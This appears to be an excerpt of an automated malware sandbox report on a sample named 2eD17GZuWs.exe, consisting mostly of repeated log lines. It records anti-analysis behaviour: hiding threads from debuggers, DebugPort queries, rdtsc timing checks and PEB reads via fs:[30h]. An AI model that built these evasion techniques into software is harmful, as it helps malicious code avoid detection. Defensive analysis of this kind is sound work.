    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc 0_2_021D044B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D3746 LdrInitializeThunk,0_2_021D3746
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 mov eax, dword ptr fs:[00000030h]0_2_021D54F4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1E09 mov eax, dword ptr fs:[00000030h]0_2_021D1E09
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1721 mov eax, dword ptr fs:[00000030h]0_2_021D1721
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1C16 mov eax, dword ptr fs:[00000030h]0_2_021D1C16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4802 mov eax, dword ptr fs:[00000030h]0_2_021D4802
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4CBB mov eax, dword ptr fs:[00000030h]0_2_021D4CBB
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5531 mov eax, dword ptr fs:[00000030h]0_2_021D5531
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D29C8 mov eax, dword ptr fs:[00000030h]0_2_021D29C8
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]1_2_1E17A61C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]1_2_1E17A61C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]1_2_1E14C600
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E178E00 mov eax, dword ptr fs:[00000030h]1_2_1E178E00
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]1_2_1E1FFE3F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201608 mov eax, dword ptr fs:[00000030h]1_2_1E201608
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14E620 mov eax, dword ptr fs:[00000030h]1_2_1E14E620
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]1_2_1E157E41
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]1_2_1E20AE44
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]1_2_1E20AE44
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]1_2_1E16AE73
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15766D mov eax, dword ptr fs:[00000030h]1_2_1E15766D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]1_2_1E210EA5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DFE87 mov eax, dword ptr fs:[00000030h]1_2_1E1DFE87
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C46A7 mov eax, dword ptr fs:[00000030h]1_2_1E1C46A7
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1736CC mov eax, dword ptr fs:[00000030h]1_2_1E1736CC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h]1_2_1E1FFEC0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E188EC7 mov eax, dword ptr fs:[00000030h]1_2_1E188EC7
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218ED6 mov eax, dword ptr fs:[00000030h]1_2_1E218ED6
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1716E0 mov ecx, dword ptr fs:[00000030h]1_2_1E1716E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1576E2 mov eax, dword ptr fs:[00000030h]1_2_1E1576E2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16F716 mov eax, dword ptr fs:[00000030h]1_2_1E16F716
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E1DFF10
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]1_2_1E1DFF10
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]1_2_1E17A70E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]1_2_1E17A70E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17E730 mov eax, dword ptr fs:[00000030h]1_2_1E17E730
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]1_2_1E21070D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]1_2_1E21070D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]1_2_1E144F2E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]1_2_1E144F2E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218F6A mov eax, dword ptr fs:[00000030h]1_2_1E218F6A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15EF40 mov eax, dword ptr fs:[00000030h]1_2_1E15EF40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15FF60 mov eax, dword ptr fs:[00000030h]1_2_1E15FF60
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E158794 mov eax, dword ptr fs:[00000030h]1_2_1E158794
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7794 mov eax, dword ptr fs:[00000030h]1_2_1E1C7794
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7794 mov eax, dword ptr fs:[00000030h]1_2_1E1C7794
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C7794 mov eax, dword ptr fs:[00000030h]1_2_1E1C7794
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1837F5 mov eax, dword ptr fs:[00000030h]1_2_1E1837F5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E1C6C0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E1C6C0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E1C6C0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6C0A mov eax, dword ptr fs:[00000030h]1_2_1E1C6C0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201C06 mov eax, dword ptr fs:[00000030h]1_2_1E201C06
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21740D mov eax, dword ptr fs:[00000030h]1_2_1E21740D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17BC2C mov eax, dword ptr fs:[00000030h]1_2_1E17BC2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]1_2_1E1DC450
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1DC450 mov eax, dword ptr fs:[00000030h]1_2_1E1DC450
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A44B mov eax, dword ptr fs:[00000030h]1_2_1E17A44B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16746D mov eax, dword ptr fs:[00000030h]1_2_1E16746D
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15849B mov eax, dword ptr fs:[00000030h]1_2_1E15849B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2014FB mov eax, dword ptr fs:[00000030h]1_2_1E2014FB
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h]1_2_1E1C6CF0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218CD6 mov eax, dword ptr fs:[00000030h]1_2_1E218CD6
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218D34 mov eax, dword ptr fs:[00000030h]1_2_1E218D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20E539 mov eax, dword ptr fs:[00000030h]1_2_1E20E539
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E153D34 mov eax, dword ptr fs:[00000030h]1_2_1E153D34
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AD30 mov eax, dword ptr fs:[00000030h]1_2_1E14AD30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1CA537 mov eax, dword ptr fs:[00000030h]1_2_1E1CA537
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E174D3B mov eax, dword ptr fs:[00000030h]1_2_1E174D3B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E167D50 mov eax, dword ptr fs:[00000030h]1_2_1E167D50
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E183D43 mov eax, dword ptr fs:[00000030h]1_2_1E183D43
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C3540 mov eax, dword ptr fs:[00000030h]1_2_1E1C3540
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F3D40 mov eax, dword ptr fs:[00000030h]1_2_1E1F3D40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]1_2_1E16C577
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16C577 mov eax, dword ptr fs:[00000030h]1_2_1E16C577
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]1_2_1E17FD9B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FD9B mov eax, dword ptr fs:[00000030h]1_2_1E17FD9B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]1_2_1E2105AC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2105AC mov eax, dword ptr fs:[00000030h]1_2_1E2105AC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581 mov eax, dword ptr fs:[00000030h]1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E142D8A mov eax, dword ptr fs:[00000030h]1_2_1E142D8A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E171DB5 mov eax, dword ptr fs:[00000030h]1_2_1E171DB5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1735A1 mov eax, dword ptr fs:[00000030h]1_2_1E1735A1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E20FDE2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov ecx, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1C6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E1C6DC9
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h]1_2_1E1F8DF1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AA16 mov eax, dword ptr fs:[00000030h]1_2_1E14AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14AA16 mov eax, dword ptr fs:[00000030h]1_2_1E14AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov ecx, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E145210 mov eax, dword ptr fs:[00000030h]1_2_1E145210
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E163A1C mov eax, dword ptr fs:[00000030h]1_2_1E163A1C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E158A0A mov eax, dword ptr fs:[00000030h]1_2_1E158A0A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E184A2C mov eax, dword ptr fs:[00000030h]1_2_1E184A2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E184A2C mov eax, dword ptr fs:[00000030h]1_2_1E184A2C
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AA16 mov eax, dword ptr fs:[00000030h]1_2_1E20AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AA16 mov eax, dword ptr fs:[00000030h]1_2_1E20AA16
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A229 mov eax, dword ptr fs:[00000030h]1_2_1E16A229
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E218A62 mov eax, dword ptr fs:[00000030h]1_2_1E218A62
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1D4257 mov eax, dword ptr fs:[00000030h]1_2_1E1D4257
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E149240 mov eax, dword ptr fs:[00000030h]1_2_1E149240
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18927A mov eax, dword ptr fs:[00000030h]1_2_1E18927A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20EA55 mov eax, dword ptr fs:[00000030h]1_2_1E20EA55
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FB260 mov eax, dword ptr fs:[00000030h]1_2_1E1FB260
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FB260 mov eax, dword ptr fs:[00000030h]1_2_1E1FB260
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17D294 mov eax, dword ptr fs:[00000030h]1_2_1E17D294
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17D294 mov eax, dword ptr fs:[00000030h]1_2_1E17D294
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E15AAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E15AAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17FAB0 mov eax, dword ptr fs:[00000030h]1_2_1E17FAB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1452A5 mov eax, dword ptr fs:[00000030h]1_2_1E1452A5
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172ACB mov eax, dword ptr fs:[00000030h]1_2_1E172ACB
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172AE4 mov eax, dword ptr fs:[00000030h]1_2_1E172AE4
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20131B mov eax, dword ptr fs:[00000030h]1_2_1E20131B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14F358 mov eax, dword ptr fs:[00000030h]1_2_1E14F358
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14DB40 mov eax, dword ptr fs:[00000030h]1_2_1E14DB40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E173B7A mov eax, dword ptr fs:[00000030h]1_2_1E173B7A
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E173B7A mov eax, dword ptr fs:[00000030h]1_2_1E173B7A
